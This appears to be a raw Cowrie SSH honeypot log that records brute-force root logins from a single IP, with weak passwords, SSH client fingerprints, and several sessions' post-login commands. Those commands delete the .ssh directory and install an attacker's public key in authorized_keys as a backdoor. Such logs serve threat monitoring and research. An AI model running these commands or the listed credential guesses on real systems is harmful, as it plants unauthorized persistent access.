{"eventid":"cowrie.session.closed","duration":"24.8","message":"Connection lost after 24.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:15.709169Z","src_ip":"212.227.235.229","session":"c5b3245be845"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35478,"dst_ip":"1.2.3.4","dst_port":22,"session":"391c207176f7","protocol":"ssh","message":"New connection: 212.227.235.229:35478 (1.2.3.4:22) [session: 391c207176f7]","sensor":"my-vps","timestamp":"2025-08-31T05:12:22.785137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:12:22.785906Z","src_ip":"212.227.235.229","session":"391c207176f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:12:23.060164Z","src_ip":"212.227.235.229","session":"391c207176f7"}
{"eventid":"cowrie.login.success","username":"root","password":"123!@#QWE","message":"login attempt [root/123!@#QWE] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:12:24.201092Z","src_ip":"212.227.235.229","session":"391c207176f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:12:24.769242Z","src_ip":"212.227.235.229","session":"391c207176f7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:12:24.769997Z","src_ip":"212.227.235.229","session":"391c207176f7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:12:24.771740Z","src_ip":"212.227.235.229","session":"391c207176f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49042,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a0609e75558","protocol":"ssh","message":"New connection: 212.227.235.229:49042 (1.2.3.4:22) [session: 0a0609e75558]","sensor":"my-vps","timestamp":"2025-08-31T05:12:24.900797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:12:24.910572Z","src_ip":"212.227.235.229","session":"0a0609e75558"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:25.047489Z","src_ip":"212.227.235.229","session":"391c207176f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:12:25.176670Z","src_ip":"212.227.235.229","session":"0a0609e75558"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:12:25.661957Z","src_ip":"212.227.235.229","session":"391c207176f7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:12:25.662636Z","src_ip":"212.227.235.229","session":"391c207176f7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:12:25.939222Z","src_ip":"212.227.235.229","session":"391c207176f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:25.940019Z","src_ip":"212.227.235.229","session":"391c207176f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36902,"dst_ip":"1.2.3.4","dst_port":22,"session":"da8dcd8fb993","protocol":"ssh","message":"New connection: 212.227.235.229:36902 (1.2.3.4:22) [session: da8dcd8fb993]","sensor":"my-vps","timestamp":"2025-08-31T05:12:26.210280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:12:26.211249Z","src_ip":"212.227.235.229","session":"da8dcd8fb993"}
{"eventid":"cowrie.login.success","username":"root","password":"zxy123456","message":"login attempt [root/zxy123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:12:26.253614Z","src_ip":"212.227.235.229","session":"0a0609e75558"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:12:26.482253Z","src_ip":"212.227.235.229","session":"da8dcd8fb993"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:12:26.821671Z","src_ip":"212.227.235.229","session":"0a0609e75558"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:12:26.822389Z","src_ip":"212.227.235.229","session":"0a0609e75558"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:12:26.823296Z","src_ip":"212.227.235.229","session":"0a0609e75558"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:27.099025Z","src_ip":"212.227.235.229","session":"0a0609e75558"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:12:27.606395Z","src_ip":"212.227.235.229","session":"da8dcd8fb993"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:12:27.702520Z","src_ip":"212.227.235.229","session":"0a0609e75558"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:12:27.703223Z","src_ip":"212.227.235.229","session":"0a0609e75558"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:12:27.981636Z","src_ip":"212.227.235.229","session":"0a0609e75558"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:27.982456Z","src_ip":"212.227.235.229","session":"0a0609e75558"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50306,"dst_ip":"1.2.3.4","dst_port":22,"session":"39dd95ccf258","protocol":"ssh","message":"New connection: 212.227.235.229:50306 (1.2.3.4:22) [session: 39dd95ccf258]","sensor":"my-vps","timestamp":"2025-08-31T05:12:28.214995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:12:28.219366Z","src_ip":"212.227.235.229","session":"39dd95ccf258"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:12:28.468224Z","src_ip":"212.227.235.229","session":"39dd95ccf258"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:28.879522Z","src_ip":"212.227.235.229","session":"da8dcd8fb993"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38034,"dst_ip":"1.2.3.4","dst_port":22,"session":"576e9ab61d0f","protocol":"ssh","message":"New connection: 212.227.235.229:38034 (1.2.3.4:22) [session: 576e9ab61d0f]","sensor":"my-vps","timestamp":"2025-08-31T05:12:29.152373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:12:29.153314Z","src_ip":"212.227.235.229","session":"576e9ab61d0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:12:29.427863Z","src_ip":"212.227.235.229","session":"576e9ab61d0f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:12:29.442425Z","src_ip":"212.227.235.229","session":"39dd95ccf258"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37758,"dst_ip":"1.2.3.4","dst_port":22,"session":"079d67477946","protocol":"ssh","message":"New connection: 212.227.235.229:37758 (1.2.3.4:22) [session: 079d67477946]","sensor":"my-vps","timestamp":"2025-08-31T05:12:30.434015Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:12:30.569419Z","src_ip":"212.227.235.229","session":"576e9ab61d0f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:30.686876Z","src_ip":"212.227.235.229","session":"39dd95ccf258"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:30.847420Z","src_ip":"212.227.235.229","session":"391c207176f7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:30.848326Z","src_ip":"212.227.235.229","session":"576e9ab61d0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51426,"dst_ip":"1.2.3.4","dst_port":22,"session":"efaeda8c512c","protocol":"ssh","message":"New connection: 212.227.235.229:51426 (1.2.3.4:22) [session: efaeda8c512c]","sensor":"my-vps","timestamp":"2025-08-31T05:12:30.942970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:12:30.950677Z","src_ip":"212.227.235.229","session":"efaeda8c512c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:12:31.185146Z","src_ip":"212.227.235.229","session":"079d67477946"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:12:31.185888Z","src_ip":"212.227.235.229","session":"079d67477946"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:12:31.208138Z","src_ip":"212.227.235.229","session":"efaeda8c512c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:12:32.247861Z","src_ip":"212.227.235.229","session":"efaeda8c512c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:32.507920Z","src_ip":"212.227.235.229","session":"efaeda8c512c"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:12:32.514912Z","src_ip":"212.227.235.229","session":"0a0609e75558"}
{"eventid":"cowrie.login.failed","username":"server","password":"root123","message":"login attempt [server/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:12:36.839995Z","src_ip":"212.227.235.229","session":"079d67477946"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44522,"dst_ip":"1.2.3.4","dst_port":22,"session":"aef092a32b33","protocol":"ssh","message":"New connection: 212.227.235.229:44522 (1.2.3.4:22) [session: aef092a32b33]","sensor":"my-vps","timestamp":"2025-08-31T05:12:36.867523Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:12:36.868345Z","src_ip":"212.227.235.229","session":"aef092a32b33"}
